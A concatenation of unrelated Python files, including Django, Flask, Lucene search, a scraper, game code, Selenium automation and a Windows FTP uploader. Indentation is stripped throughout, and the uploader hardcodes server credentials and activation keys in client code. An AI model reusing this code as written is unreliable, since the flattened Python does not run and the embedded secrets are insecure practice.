#self.fields['pan_img'].widget.attrs['required'] = True
self.fields['room_no'].widget.attrs.update({'class' : 'form-control'})
self.fields['room_no'].widget.attrs['required'] = True
self.fields['occupatin'].widget.attrs.update({'class' : 'form-control'})
self.fields['occupatin'].widget.attrs['required'] = True
self.fields['rent'].widget.attrs.update({'class' : 'form-control'})
self.fields['rent'].widget.attrs['required'] = True
self.fields['food_required'].widget.attrs.update({'class' : 'form-control'})
self.fields['food_required'].widget.attrs['required'] = True
self.fields['food_amt'].widget.attrs.update({'class' : 'form-control'})
self.fields['food_amt'].widget.attrs['required'] = True
self.fields['advance_amt'].widget.attrs.update({'class' : 'form-control'})
self.fields['joining_date'].widget.attrs.update({'class' : 'form-control'})
self.fields['joining_date'].widget.attrs['required'] = True
self.fields['status'].widget.attrs.update({'class' : 'form-control'})
self.fields['vacate_date'].widget.attrs.update({'class' : 'form-control'}) |
import sys
import math
def main(argv):
maximum = int(argv[0])
markers = [True] * (maximum + 1)
for i in xrange(2, int(math.sqrt(maximum)) + 1):
if markers[i]:
for j in xrange(i ** 2, maximum + 1, i):
markers[j] = False
primes = [p for p in xrange(2, maximum + 1) if markers[p]]
count = len(primes)
print
print ' Total primes between 2 and %s: %s' % (maximum, count)
print 'Total composites between 2 and %s: %s' % (maximum, maximum - 1 - count)
print
print '\n'.join([', '.join(['%4s' % p for p in primes[k:k + 10]]) for k in xrange(0, len(primes), 10)])
print
if __name__ == "__main__":
main(sys.argv[1:])
|
from django.db import models
from django.contrib.auth.models import User
from django_extensions.db.fields import CreationDateTimeField, ModificationDateTimeField
from deptx.helpers import generateUUID
#from mop.trustmanager import tm_getTotalTrust, tm_getCurrentTrust, tm_getCurrentTrustCredit, tm_getCurrentClearance
#TODO move Player into CRON
#TODO move Cron and Mop into appropriate apps
class Player(models.Model):
firstName = models.CharField(max_length=50)
lastName = models.CharField(max_length=50)
email = models.EmailField()
createdAt = CreationDateTimeField()
modifiedAt = ModificationDateTimeField()
def __unicode__(self):
return self.firstName + " " + self.lastName
class Cron(models.Model):
player = models.OneToOneField(Player)
user = models.OneToOneField(User)
activated = models.BooleanField(default=False)
activationCode = models.CharField(max_length=36, default=generateUUID)
createdAt = CreationDateTimeField()
modifiedAt = ModificationDateTimeField()
def __unicode__(self):
return self.user.username + " (" + self.player.firstName + " " + self.player.lastName + ")"
class Mop(models.Model):
GENDER_MALE = 0
GENDER_FEMALE = 1
GENDER_OTHER = 2
GENDER_CHOICES = (
(GENDER_MALE, 'male'),
(GENDER_FEMALE, 'female'),
(GENDER_OTHER, 'other'),
)
MARITAL_SINGLE = 0
MARITAL_MARRIED = 1
MARITAL_DIVORCED = 2
MARITAL_WIDOWED = 3
MARITAL_CHOICES = (
(MARITAL_SINGLE, 'single'),
(MARITAL_MARRIED, 'married'),
(MARITAL_DIVORCED, 'divorced'),
(MARITAL_WIDOWED, 'widowed'),
)
HAIR_BLONDE = 0
HAIR_BROWN = 1
HAIR_BLACK = 2
HAIR_GREY = 3
HAIR_WHITE = 4
HAIR_RED = 5
HAIR_AUBURN = 6
HAIR_CHESTNUT = 7
HAIR_CHOICES = (
(HAIR_BLONDE, 'blonde'),
(HAIR_BROWN, 'brown'),
(HAIR_BLACK, 'black'),
(HAIR_GREY, 'grey'),
(HAIR_WHITE, 'white'),
(HAIR_RED, 'red'),
(HAIR_AUBURN, 'auburn'),
(HAIR_CHESTNUT, 'chestnut'),
)
EYE_BLUE = 0
EYE_BROWN = 1
EYE_GREEN = 2
EYE_GREY = 3
EYE_AMBER = 4
EYE_HAZEL = 5
EYE_RED = 6
EYE_VIOLET = 7
EYES_CHOICES = (
(EYE_BLUE, 'blue'),
(EYE_BROWN, 'brown'),
(EYE_GREEN, 'green'),
(EYE_GREY, 'grey'),
(EYE_AMBER, 'amber'),
(EYE_HAZEL, 'hazel'),
(EYE_RED, 'red'),
(EYE_VIOLET, 'violet'),
)
CLEARANCE_0_NONE = -1
CLEARANCE_1_LOW = 0
CLEARANCE_2_MEDIUM = 1
CLEARANCE_3_HIGH = 2
CHOICES_CLEARANCE = (
(CLEARANCE_0_NONE, 'NONE'),
(CLEARANCE_1_LOW, 'BLUE'),
(CLEARANCE_2_MEDIUM, 'RED'),
(CLEARANCE_3_HIGH, 'ULTRAVIOLET'),
)
player = models.ForeignKey(Player)
user = models.OneToOneField(User)
active = models.BooleanField(default=True)
createdAt = CreationDateTimeField()
modifiedAt = ModificationDateTimeField()
firstname = models.CharField(max_length=100)
lastname = models.CharField(max_length=100)
dob = models.DateField()
gender = models.IntegerField(choices=GENDER_CHOICES)
weight = models.IntegerField()
height = models.IntegerField()
marital = models.IntegerField(choices=MARITAL_CHOICES)
hair = models.IntegerField(choices=HAIR_CHOICES)
eyes = models.IntegerField(choices=EYES_CHOICES)
serial = models.CharField(max_length=36, default=generateUUID)
totalTrust = models.IntegerField(default=0)
trust = models.IntegerField(default=0)
credit = models.IntegerField(default=0)
clearance = models.IntegerField(choices=CHOICES_CLEARANCE, default=CLEARANCE_1_LOW)
# def getTotalTrust(self):
# return tm_getTotalTrust(self)
#
# def getCurrentTrust(self):
# return tm_getCurrentTrust(self)
#
# def getCurrentTrustCredit(self):
# return tm_getCurrentTrustCredit(self)
#
# def getCurrentClearance(self):
# return tm_getCurrentClearance(self)
def __unicode__(self):
return "%s - cron: %s - active: %s" % (self.user.username, self.player.cron.user.username, self.active)
|
import json
if __name__ == "__main__":
dest = open('tokens.py', 'a')
sushiswapTokenList = open('sushiswapTokenList.txt', 'r')
uniswapDefaultList = open('uniswapDefaultList.txt', 'r')
uni = json.loads(uniswapDefaultList.read())
sushi = json.loads(sushiswapTokenList.read())
lists = [uni, sushi]
symbols = []
for l in lists:
for token in l.get('tokens'):
duplicate = False
if (token.get('symbol') in symbols):
duplicate = True
break
if duplicate == False:
token_desc = token.get('symbol') + " = {\n"
token_desc += "\'symbol\': \'" + token.get('symbol') + "\',\n"
token_desc += "\'name\': \'" + token.get('name') + "\',\n"
token_desc += "\'address\': hex(" + token.get('address') + "),\n"
token_desc += "\'cksum_address\': w3.toChecksumAddress(\'" + token.get('address') + "\'),\n"
token_desc += "\'decimals\': " + str(token.get('decimals')) + ",\n"
token_desc += "}\n"
symbols.append(token.get('symbol'))
dest.write(token_desc) |
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def swapPairs(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head==None or head.next==None:
return head
p=head
newhead=head.next
q=p.next
while p!=None and q!=None:
r=q.next
if r!=None:
s=r.next
else:
s=None
q.next=p
if s!=None:
p.next=s
elif r!=None:
p.next=r
else:
p.next=None
p=r
q=s
return newhead
# 最优思路
# 和链表反转类似,关键在于 有三个指针,分别指向前后和当前节点。不同点是两两交换后,移动节点步长为2
|
#!/usr/bin/env python
import sys
import jieba
from stemming.porter2 import stem
from lucene import VERSION, initVM
from java.io import File, StringReader
from org.apache.lucene.index import DirectoryReader
from org.apache.lucene.analysis.core import SimpleAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.analysis.cn import ChineseAnalyzer
from org.apache.lucene.search.highlight import Highlighter, \
SimpleFragmenter, QueryScorer, SimpleHTMLFormatter
from org.apache.lucene.store import SimpleFSDirectory
from org.apache.lucene.search import IndexSearcher
from org.apache.lucene.queryparser.classic import QueryParser
from org.apache.lucene.util import Version
class ArticleSearcher(object):
def __init__(self, store_dir):
initVM()
directory = SimpleFSDirectory(File(store_dir))
self.searcher = IndexSearcher(DirectoryReader.open(directory))
print 'loaded index: %s' % store_dir
self.analyzer = {}
self.analyzer['StandardAnalyzer'] = StandardAnalyzer(Version.LUCENE_CURRENT)
self.analyzer['SimpleAnalyzer'] = SimpleAnalyzer(Version.LUCENE_CURRENT)
self.analyzer['ChineseAnalyzer'] = ChineseAnalyzer(Version.LUCENE_CURRENT)
def _set_store_dir(self, store_dir):
self.searcher.close()
directory = SimpleFSDirectory(File(store_dir))
self.searcher = IndexSearcher(directory, True)
print 'loaded index: %s' % store_dir
def close(self):
self.searcher.close()
def search_by(self, **kwargs):
command = kwargs.get('command', '')
if command == '':
return None
field = kwargs.get('field')
query_type = kwargs.get('query_type', 'chi')
if query_type == 'chi':
if field in ['token_taglist', 'token_content', 'token_title', 'token_author']:
command = ' '.join(jieba.cut_for_search(command))
hlt_analyzer = self.analyzer['ChineseAnalyzer']
else:
if field in ['token_content', 'token_title']:
command = ' '.join(map(stem, command.split()))
hlt_analyzer = self.analyzer['StandardAnalyzer']
analyzer = self.analyzer['SimpleAnalyzer']
num = kwargs.get('num', 50)
attrs = kwargs.get('attrs', ['url', 'title'])
print "[%s]\tSearching for '%s' in field '%s'" % (query_type, command, field)
query = QueryParser(Version.LUCENE_CURRENT, field, analyzer).parse(command)
if field in ['token_content', 'token_title']:
getAbs = True
query_for_highlight = QueryParser(Version.LUCENE_CURRENT, 'content', hlt_analyzer).parse(command)
scorer = QueryScorer(query_for_highlight)
formatter = SimpleHTMLFormatter("<strong>", "</strong>")
# formatter = SimpleHTMLFormatter("<span class=\"highlight\">", "</span>")
highlighter = Highlighter(formatter, scorer)
fragmenter = SimpleFragmenter(20)
highlighter.setTextFragmenter(fragmenter)
else:
getAbs = False
scoreDocs = self.searcher.search(query, num).scoreDocs
print "%s total matching documents." % len(scoreDocs)
articles = []
for scoreDoc in scoreDocs:
doc = self.searcher.doc(scoreDoc.doc)
article = {}
for attr in attrs:
article[attr] = doc.get(attr)
if getAbs is True:
content = doc.get('content')
tokenStream = hlt_analyzer.tokenStream("content", StringReader(content))
article['abstract'] = highlighter.getBestFragments(tokenStream, content, 3, "...")
articles.append(article)
return articles
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: SearchFiles <IndexPath>"
sys.exit(-1)
print 'lucene', VERSION
searcher = ArticleSearcher(sys.argv[1])
while True:
command = raw_input("Query:")
if command == '':
break
for article in searcher.search_by(field='token_title', command=command, query_type='chi', num=100):
print 'title: %s' % article['abstract']
|
# This script scrapes KBDI data from http://flame.fl-dof.com/cgi-bin/KbdiArchiveListing.py
# Specifically, it grabs all archived reports from that site and saves them as
# .csv files locally
from bs4 import BeautifulSoup
import argparse
import urllib2
import re
import string as str
import os
# Helper functions, which will be referred to below
def is_valid_row(elt):
return elt.name == "tr" and len(elt.contents) > 5
def get_text(column):
node = column.find("font")
if node == None:
return ""
else:
return node.find(string=True)
def get_filename(link):
splits = str.split(link, "/")
report_html_file = splits[len(splits) - 1]
filename = str.replace(report_html_file, ".html", ".csv")
return filename
def is_within_date_range(link, start_date, end_date):
href = link['href']
splits = str.split(href, "/")
report_html_file = splits[len(splits) - 1]
report_base_name = str.replace(report_html_file, ".html", "")
splits = str.split(report_base_name, "-")
date_str = splits[2]
year = date_str[0:4]
month = date_str[4:6]
date = date_str[6:8]
date_str = str.join([year, month, date], "-")
within_range_start = (start_date == None) or (date_str >= start_date)
within_range_end = (end_date == None) or (date_str <= end_date)
return within_range_start and within_range_end
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--start_date", help = "date of first report to download data for")
parser.add_argument("--end_date", help = "date of last report to download data for")
args = parser.parse_args()
# Initialize output directory
data_dir = "data/kbdi/"
if not os.path.exists(data_dir):
os.makedirs(data_dir)
# Initialize scraper
domain = "http://flame.fl-dof.com/"
start_url = domain + "/cgi-bin/KbdiArchiveListing.py"
page = urllib2.urlopen(start_url)
page_reader = BeautifulSoup(page.read(), "lxml")
# For each report, scrape the contents and write to a .csv
links = page_reader.find_all("a", href = re.compile("archive/kbdi-report-20"))
for link in links:
# if the report is not in the specified date range, skip it
if not is_within_date_range(link, args.start_date, args.end_date):
continue
report_href = link['href']
report_filename = get_filename(report_href)
output_filename = data_dir + report_filename
report_url = domain + report_href
report_reader = BeautifulSoup(urllib2.urlopen(report_url), "lxml")
output_file = open(output_filename, 'w')
print("Now writing to " + report_filename + "...")
table_rows = report_reader.find_all(is_valid_row)
for row in table_rows:
columns = row.find_all(["th", "td"])
column_texts = []
for column in columns:
text = get_text(column)
if text == u'\xa0' or text == None:
text = ""
column_texts.append(text)
output = str.join(column_texts, ",") + "\n"
output_file.write(output)
output_file.close()
print "Done."
|
#funkcja rysujaca graf, przyjmuje liste z listami
# nalezy zainsatalowac biblioteke Graphviz 2.38 i dodac .../Graphviz 2.38/bin
# do zmiennych srodowiskowych
from graphviz import Digraph
import os
def draw_graph(data):
graph = Digraph(comment='Program Dependences Diagram')
graph.attr('node', shape='box', style='filled', fillcolor='lightblue')
for x in data:
vertex1 = x[0] + "\n" + str(x[1])
vertex2 = x[2] + "\n" + str(x[3])
edge = str(x[4])
graph.edge(vertex1, vertex2, edge)
graph.attr(fontsize='20')
graph.view()
|
# -*- coding: utf-8 -*-
# Tower / tirs
__author__ = 'Quentin'
from grille import *
from outils import *
# Algo
# chaque tour gère son rythme de tir
# une tour qui tire :
# - cherche sa cible (la plus proche, la plus proche de la sortie, ...)
# - cree un tir, l'ajoute à la liste des tirs à suivre.
class Tir():
def __init__(self, bete, vitesse,force, force_coeff,force_ralentire,compte_a_rebour_ralentire, x = 100, y = 100):
self.x = x # pixel abscisse
self.y = y # ordonnéee
self.bete = bete # cible du tir
self.vitesse = vitesse
self.impact = False # le tir a-t-il atteint sa cible ?
self.force = force_coeff # force du tir (diminution de vie de la bestiole touchee)
self.force_niveau = force
self.force_ralentire = force_ralentire
self.compte_a_rebour_ralentire = compte_a_rebour_ralentire
# ------------------------------------------------
def affiche(self):
couleur = BLANC
if self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]:
couleur = BLANC
elif self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]+TABLE_NORMALE_TOUR_VITESSE[1]:
couleur = JAUNE
elif self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]+TABLE_NORMALE_TOUR_VITESSE[1]+TABLE_NORMALE_TOUR_VITESSE[2]:
couleur = ORANGE
elif self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]+TABLE_NORMALE_TOUR_VITESSE[1]+TABLE_NORMALE_TOUR_VITESSE[2]+TABLE_NORMALE_TOUR_VITESSE[3]:
couleur = ROUGE
tail = 2
if self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]:
tail = 1
elif self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]+TABLE_NORMALE_TOUR_FORCE[1]:
tail = 2
elif self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]+TABLE_NORMALE_TOUR_FORCE[1]+TABLE_NORMALE_TOUR_FORCE[2]:
tail = 3
elif self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]+TABLE_NORMALE_TOUR_FORCE[1]+TABLE_NORMALE_TOUR_FORCE[2]+TABLE_NORMALE_TOUR_FORCE[3]:
tail = 4
pygame.draw.circle(SCREEN, couleur, [int(self.x), int(self.y)], tail, 0)
pass
# ------------------------------------------------
def deplace(self):
# TODO : prendre le centre de la bestiole et pas le coin pixel haut-gauche
dirx = self.bete.x - self.x
diry = self.bete.y - self.y
distance = math.sqrt(dirx ** 2 + diry **2)
# impact
if distance < self.vitesse:
self.impact = True
return
# sinon deplace
dirx = dirx / distance
diry = diry / distance
self.x = int(self.x + dirx * self.vitesse )
self.y = int(self.y + diry * self.vitesse )
# ------------------------------------------------
def traite_impact(self):
# on diminue la vie de la bestiole selon la force du tir
if self.bete.vie > self.force:
self.bete.vie -= self.force
if self.bete.ralentie(self.compte_a_rebour_ralentire,self.force_ralentire):
self.bete.vitesse = self.bete.vitesse * self.force_ralentire
else:
self.bete.vie=0 |
from flask import Blueprint, request, render_template, \
flash, g, session, redirect, url_for
from flask.ext.user.signals import user_logged_in, user_registered
from flask_user import current_user, login_required
import app
from app import db
from models import User
mod_user = Blueprint('user', __name__, url_prefix='/user')
@mod_user.route('/dashboard', methods=['GET', 'POST'])
@login_required
def dashboard():
form = UserForm()
if form.validate_on_submit():
current_user.first_name = form.first_name.data
current_user.last_name = form.last_name.data
db.session.commit()
flash('Setting saved.')
return redirect(url_for('.dashboard'))
form.first_name.data = current_user.first_name
form.last_name.data = current_user.last_name
form.phone.data = current_user.phone
form.address.data = current_user.address
form.city.data = City.get_name_by_id(current_user.city_id)
form.country_id.data = Country.get_name_by_id(
current_user.country_id)
form.zipcode.data = current_user.zipcode
return render_template("user/dashboard.html", form=form)
@mod_user.route('/update', methods=['POST'])
@login_required
def update_user():
form = UserForm()
if form.validate_on_submit():
print form
return 'hi'
@mod_user.route('/')
def show_users():
users = User.query.all()
return render_template("user/index.html", users=users)
@mod_user.route('/profile')
@login_required
def user_profile():
return 'hi'
@mod_user.route('/setting')
@login_required
def setting():
return 'setting'
# seems the hook doesn't work if placed here
@user_logged_in.connect_via(app)
def _after_login_hook(sender, user, **extra):
sender.logger.info('user logged in')
print 'mod_user controller: user logged in'
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sys
from curvefit import *
class multicurvefit(curvefit):
'''The curve in a loglog plane can be decomposed in several picewise .
'''
polys=pd.DataFrame()
def __init__(self,x=[],y=[]):# *args, **kwargs):
#super(multicurvefit, self).__init__(*args, **kwargs)
self.x=np.asarray(x)
self.y=np.asarray(y)
def __getitem__(self, key):
if key=='x':
return self.x
elif key=='y':
return self.y
else:
sys.exit('Not key: %s' %key)
def add_curve(self,xmin,xmax,poly_order=1,ShowPlot=True,verbose=False):
'''Add one straight segment to the logarhitmic fit
between xmin and xmax,
WARNING: xmax not inclued in the range of the fit
ShowPlot to check the fit
'''
df=pd.DataFrame()
ps=pd.Series()
df['x']=self.x
df['y']=self.y
d=df[np.logical_and(df.x>=xmin,df.x<=xmax)]
c=curvefit(d.x.values,d.y.values)
c.add_fit(poly_order) #poulates c object
ps['coeffs']=c.coeffs
ps['xmin']=xmin
ps['xmax']=xmax
self.polys=self.polys.append(ps,ignore_index=True)
def delete_last_curve(self):
'''Delete tha last saved straight segment'''
self.polys=self.polys[:-1]
def to_json(self,jsonfile):
'''
Save the fit data to a json file with colums:
coeffs,xmin,xmax
where coeffs are used to build the poly1d objects
'''
self.polys.to_json(jsonfile)
def read_json(self,jsonfile):
'''
Recover fitted data from a json file with colums:
coeffs,xmin,xmax
where coeffs are used to build the poly1d objects
'''
#http://stackoverflow.com/questions/20603925/label-based-indexing-pandas-loc
self.polys=pd.read_json(jsonfile,dtype=object)
for i in range(self.polys.shape[0]):
self.polys.loc[i,'coeffs']=np.asarray(self.polys.ix[i].coeffs)
self.polys=self.polys.reset_index(drop=True)
def __call__(self,x,verbose=True):
'''
Given a set of coefficients for xmin<=x<xmax,
built the proper poly1d an evalute it in that point
'''
xa=np.asarray(x)
limit=np.array([])
if not np.asarray(x).shape:
xa=np.asarray([x])
for xx in xa:
wrng=False
if xx<self.polys.xmin.min():
wrng=True
coeffs=self.polys[:1]
elif xx>=self.polys.xmax.max():
wrng=True
coeffs=self.polys[-1:]
else:
coeffs=self.polys[np.logical_and(self.polys.xmin<=xx,self.polys.xmax>xx)]
if wrng:
if verbose:
print('WARNING: Out of fitted range:',xx)
coeffs=coeffs.coeffs.reset_index(drop=True)[0]
if len(coeffs)>0:
p=np.poly1d(coeffs)
limit=np.append( limit,10.**( p( np.log10(xx) ) ) )
else:
sys.exit('ERROR: Out of range')
if limit.shape[0]==1:
limit=limit[0]
return limit
|
from Include.PytestFrameWorkApproch.BasePkg.DriverClassModule import SelenumDriver
SDriver=SelenumDriver("firefox")
import time
SDriver.Driver.get("https://learn.letskodeit.com/p/practice")
ParentHandle=SDriver.Driver.current_window_handle
SDriver.clickElementWithResult('xpath', "//button[@id='openwindow']")
handles=SDriver.Driver.window_handles
for handle in handles:
if handle != ParentHandle:
SDriver.Driver.switch_to.window(handle)
print ("New window handle is " + handle)
SearchCource, SearchCourceTorF = SDriver.getElementWithResult('xpath', "//input[@id='search-courses']")
if SearchCourceTorF:
SearchCource.send_keys("Python")
time.sleep(6)
SDriver.Driver.close()
SDriver.Driver.switch_to.window(ParentHandle)
time.sleep(3)
# SDriver.clickElementWithResult('xpath', "//a[@id='opentab']")
SDriver.clickElementWithResult('xpath', "//a[contains(text(), 'Login')]")
|
# coding: utf-8
"""Helper to support writing Unicode CSV files."""
import codecs
import cStringIO
import csv
import six
class UnicodeWriter(object):
"""CSV writer which supports unicode output.
Lifted from https://docs.python.org/2/library/csv.html
"""
def __init__(self, stream, dialect=csv.excel, encoding="utf-8", **kwds):
self.buffer = cStringIO.StringIO()
self.writer = csv.writer(self.buffer, dialect=dialect, **kwds)
self.stream = stream
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
"""Write a row, encoding it in the chosen encoding.
Works by using the built in CSV writer to write utf-8 encoded data to a
buffer, and then re-encodes that data to the chosen encoding before
writing it to the given stream.
"""
def encode_strings(row):
for item in row:
if isinstance(item, six.string_types):
yield item.encode("utf-8")
else:
yield item
self.writer.writerow(list(encode_strings(row)))
self.stream.write(
self.encoder.encode(
self.buffer.getvalue().decode("utf-8")
)
)
self.buffer.truncate(0)
def writerows(self, rows):
"""Write multiple rows to the CSV file."""
for row in rows:
self.writerow(row)
|
from hive.data.transformation.utils import relabel_node_ids, generate_adjacency_matrix, generate_ns
from datetime import datetime
import pandas as pd
import numpy as np
import networkx as nx
import scipy.sparse as sps
import random
import torch
class Compose(object):
def __init__(self, dataset_path, dataset_file, device, relabel_nodes = False, weight_threshold=1000):
custom_date_parser = lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S")
data_pd = pd.read_csv(f"{dataset_path}/{dataset_file}", parse_dates=['viewing_minute'], date_parser=custom_date_parser)
data_pd['partner_node_id'] = data_pd['partner_node_id'].fillna(-1)
data_pd['partner_node_id'] = data_pd['partner_node_id'].astype('int64')
data_pd['downloadRate'] = data_pd['downloadRate'].fillna(0)
data_pd['weight'] = data_pd['downloadRate'].apply(lambda x: x / weight_threshold if x <= weight_threshold else 1)
data_pd, self.num_nodes = relabel_node_ids(data_pd, relabel_nodes)
self.data = data_pd[['source_node_id', 'partner_node_id', 'weight']]
self.static_graph = nx.from_pandas_edgelist(self.data, source='source_node_id', target='partner_node_id', edge_attr=['weight'])
self.static_graph.remove_node(-1)
self.all_edges = [(edge[0], edge[1], edge[2]['weight']) for edge in self.static_graph.edges(data=True)]
self.edges_no_weights = set()
for edge in self.static_graph.edges():
self.edges_no_weights.add((edge[0],edge[1]))
self.train_adj = np.zeros((self.num_nodes, self.num_nodes))
self.val_adj = np.zeros((self.num_nodes, self.num_nodes))
self.test_adj = np.zeros((self.num_nodes, self.num_nodes))
self.device = device
def get_features(self, node_features = False):
return torch.tensor(sps.identity(self.num_nodes, dtype=np.float32, format='coo').todense(), dtype=torch.float32, device=self.device)
def split_data(self, train_perc=0.6, val_perc = 0.5, ns=1):
random.shuffle(self.all_edges)
num_train_edges = int(len(self.all_edges) * train_perc)
num_val_edges = int((len(self.all_edges) - num_train_edges) * val_perc)
train_edges = self.all_edges[:num_train_edges]
train_edges.extend(generate_ns(train_edges, self.edges_no_weights, self.num_nodes, ns))
# print(train_edges)
train_adj = torch.tensor(generate_adjacency_matrix(train_edges, self.num_nodes), dtype=torch.float32, device=self.device).to_sparse()
train_edges_indices, train_edges_values = self.__transform_arrays_to_tensor__(train_edges)
val_edges = self.all_edges[num_train_edges:(num_train_edges + num_val_edges)]
val_edges.extend(generate_ns(val_edges, self.edges_no_weights, self.num_nodes, ns))
val_edges_indices, val_edges_values = self.__transform_arrays_to_tensor__(val_edges)
test_edges = self.all_edges[(num_train_edges + num_val_edges):]
test_edges.extend(generate_ns(test_edges, self.edges_no_weights, self.num_nodes, ns))
test_edges_indices,test_edges_values = self.__transform_arrays_to_tensor__(test_edges)
return train_adj, train_edges_indices, train_edges_values, val_edges_indices, val_edges_values, test_edges_indices, test_edges_values
def __transform_arrays_to_tensor__(self, edges):
adj_indices = [torch.tensor([edge[0] for edge in edges], requires_grad=False, device=self.device), torch.tensor([edge[1] for edge in edges], requires_grad=False, device=self.device)]
adj_values = torch.reshape(torch.tensor([edge[2] for edge in edges], dtype=torch.float32 , device=self.device), (-1,))
return adj_indices, adj_values
|
# -*- coding: utf8 -*-
import os
import time
import string
import random
import socket
import win32api
import win32con
import base64
from ftplib import FTP
userID = ' '
username = 'test'
password = 'test'
host = '192.168.194.6'
path = './media'
remotepath = '/'
client_keys = ['01TW5JKD','02YUW8B3','03W49GHK']
def get_new_name():
now_time = time.strftime("%Y%m%d",time.localtime())
chars = string.digits + string.letters
gen_str = ''.join(random.sample(chars,5))
new_name = now_time + gen_str + userID +'.mp4'
return(new_name)
def rename_file():
print '\n'
for file in os.listdir(path):
if os.path.isfile(os.path.join(path,file)) == True:
os.rename(os.path.join(path,file),os.path.join(path,get_new_name()))
print '%s ==> %s\n' % (file,get_new_name())
log = open('log.txt','a+')
action = time.strftime('%Y%m%d %H:%M:%S ', time.localtime()) + file +' '+ get_new_name()
log.write(action+'\n')
log.close()
def uploading():
for file in os.listdir(path):
try:
f = FTP(host)
f.login(username,password)
f.cwd(remotepath)
fd = open(os.path.join(path,file),'rb')
print u'正在上传:',
print file
f.storbinary('STOR %s' % os.path.basename(file),fd)
fd.close()
f.quit()
except:
print '%s' % file
print u'上传失败!'
print u'\n视频已全部上传完成!\n'
print u'按任意键退出!'
raw_input('')
def upload_file():
try:
dirs = os.listdir('media')
print '-'* 50
print u'已在media文件夹下读取到以下文件:'
print '-'* 50
for file in dirs:
print file+'\n'
print '-'* 50
print u'是否全部上传(y/n)?'
ch = raw_input(' ')
try:
if (ch == 'y' or ch == 'Y'):
rename_file()
uploading()
except:
print u'已取消上传!'
except :
print u'无法读取当前的media文件夹,请先创建media文件夹再将视频文件放入其中!'
s = os.getcwd()
print u'当前路径为'+s+'\n\n'
time.sleep(5)
def list_file():
try:
f = FTP(host)
f.login(username,password)
f.cwd(remotepath)
print '-'* 50
print u'服务器文件列表:'
print '-'* 50
files = f.dir()
print files
print '-'* 50
f.quit()
print u'\n按任意键退出!'
raw_input('')
except:
print u'服务器文件列表获取失败!'
def read_reg():
try:
subkey = 'SOFTWARE\Microsoft\Windows\CurrentVersion'
key = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE,subkey,0,win32con.KEY_READ)
string = win32api.RegQueryValueEx(key,'ftp_client')
return True
except:
return False
def add_reg(client_key):
print 'client_key = %s' % client_key
try:
subkey = 'SOFTWARE\Microsoft\Windows\CurrentVersion'
key = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE,subkey,0,win32con.KEY_ALL_ACCESS)
win32api.RegSetValueEx(key,'ftp_client',0,win32con.REG_SZ,client_key)
return True
except:
print u'权限不许可,请以管理员权限运行!'
return False
def running():
print '\n'+'-'*50
print u' 1.上传视频文件\n 2.服务器文件列表\n'
ch = raw_input('==> ')
try:
if (ch == '1'):
upload_file()
elif(ch == '2'):
list_file()
else:
print u'输入错误!\n'
except:
print u'初始化失败!'
def get_key():
global userID
print u'此上传插件尚未激活,请输入激活密钥:'
client_key = raw_input('>>>')
if client_key in client_keys:
if add_reg(client_key):
print u'此上传插件已激活!\n'
userID = client_key[:2]
print userID
running()
else:
print u'激活失败,请输入正确的密钥!'
def login_client():
if read_reg():
running()
else:
get_key()
if __name__ == '__main__':
login_client()
time.sleep(3)
|
# Generated by Django 2.0.5 on 2018-05-18 21:16
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CreateUsr',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('logfld', models.CharField(max_length=40)),
('passfld', models.CharField(max_length=40)),
('langfld', models.CharField(max_length=3)),
('key', models.CharField(max_length=2)),
],
),
migrations.CreateModel(
name='Creating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('inputfld', models.IntegerField()),
('checkbox', models.BooleanField()),
('key', models.CharField(max_length=2)),
],
),
]
|
#A simple program to resize the Chars74K dataset to 40x40 images and invert the colours
import os
from PIL import Image, ImageOps
os.chdir(os.path.dirname(os.path.realpath(__file__)))
#os.mkdir("Chars74KResized") #Creates a new directory for the files
for i in os.listdir("Chars74KResized/"):
#os.mkdir("Chars74KResized/"+i)#Creates a new directory for each character
for j in os.listdir("Chars74K/"+i):
im=Image.open("Chars74KResized/"+i+"/"+j)
im=ImageOps.invert(im) #Inverts the image
#im=im.resize((40,40)) #Resizes the image
#im.save("Chars74KResized/"+i+"/"+j)#Saves the image |
import logging
from typing import Optional
from pygame import Surface
from pygame import draw as pygame_draw
from base_object import BaseObject
from common import RED
from common import TILE_SIZE
from tile_objects.base_tile_object import BaseTileObject
from tile_objects.units.unit import Unit
logger = logging.getLogger('Tile')
logger.setLevel(10)
class Tile(BaseObject):
_surface = None
_objects = list
def __init__(self, objects, surface: Optional[Surface]):
super().__init__()
self._objects = objects
self._surface = surface
def __str__(self):
return "Tile has these objects: %s" % str(self._objects)
def draw(self):
if self.surface is not None:
if len(self._objects) is 0:
pygame_draw.line(self.surface, RED, (0, 0),
(TILE_SIZE, TILE_SIZE), 3)
pygame_draw.line(self.surface, RED, (TILE_SIZE, 0),
(0, TILE_SIZE), 3)
else:
for obj in self._objects:
if isinstance(obj, BaseTileObject):
obj.draw(surface=self._surface)
else:
logger.info("No surface set")
@property
def surface(self) -> Surface:
return self._surface
@surface.setter
def surface(self, surface):
self._surface = surface
@property
def objects(self) -> list:
return self._objects
@objects.setter
def objects(self, objects):
self._objects = objects
def get_unit(self) -> Optional[Unit]:
for obj in self._objects:
if isinstance(obj, Unit):
return obj
return None
def pop_unit(self) -> Optional[Unit]:
for index in range(len(self._objects)):
if isinstance(self._objects[index], Unit):
return self._objects.pop(index)
return None
